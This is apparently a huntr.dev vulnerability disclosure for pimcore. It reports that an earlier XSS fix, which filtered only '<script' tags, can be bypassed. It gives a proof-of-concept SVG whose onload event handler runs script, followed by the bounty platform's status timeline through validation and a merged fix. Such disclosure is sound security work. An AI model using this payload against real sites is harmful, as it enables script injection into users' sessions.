Exposure of Sensitive Information to an Unauthorized Actor in pimcore/pimcore

Valid

Reported on

Jan 20th 2022


Description

XSS

Proof of Concept

Previous bug https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6/ is not properly fixed. it can be bypassed using with event handler . https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911 its only checking <script tag which will be bypassed using onload event handler

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
We are processing your report and will contact the pimcore team within 24 hours. 5 months ago
We have contacted a member of the pimcore team and are waiting to hear back 5 months ago
We have sent a follow up to the pimcore team. We will try again in 7 days. 5 months ago
We have sent a second follow up to the pimcore team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the pimcore team. This report is now considered stale. 5 months ago
JiaJia Ji validated this vulnerability 5 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
JiaJia Ji confirmed that a fix has been merged on 7697f7 5 months ago
JiaJia Ji has been awarded the fix bounty
to join this conversation